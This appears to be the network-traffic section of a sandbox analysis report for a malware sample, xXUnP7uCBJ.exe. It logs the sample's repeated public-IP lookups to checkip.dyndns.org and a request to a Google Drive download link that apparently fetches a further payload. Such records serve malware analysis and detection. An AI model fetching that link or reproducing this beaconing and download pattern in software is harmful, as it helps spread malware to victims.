                                                                                                            10192.168.2.849984193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:33.505443096 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:34.140646935 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.849996193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:35.198707104 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:35.849348068 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.850005193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:36.767517090 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:37.402733088 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.850007193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:38.373991966 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:38.999644041 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.850009193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:40.065366030 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:40.697213888 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.850011193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:41.815677881 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:42.471446991 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:42 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.850013193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:43.447027922 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:44.109529972 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.850015193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:45.025974989 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:45.665112972 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:45 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.850017193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:47.650533915 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:48.322406054 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.850019193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:49.359824896 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:49.995424032 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.850021193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:50.939788103 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:51.566680908 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.850023193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:52.481209040 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:53.124181032 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:53 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.850025193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:54.003122091 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:54.652731895 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.850027193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:55.610965967 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:56.246154070 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.850029193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:57.176326036 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:57.844468117 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.850031193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:58.921164989 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:59.693829060 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.850033193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:42:00.569521904 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:42:01.222454071 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:42:01 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.850035193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:42:02.319140911 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:42:02.958204031 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:42:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            28192.168.2.850037193.122.6.16880
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:42:06.888256073 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:42:07.556528091 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849785142.250.181.2384435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:04 UTC216OUTGET /uc?export=download&id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2025-01-10 20:41:04 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:41:04 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'nonce-LkVKCc7Dg1bhwL0nZgtDLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
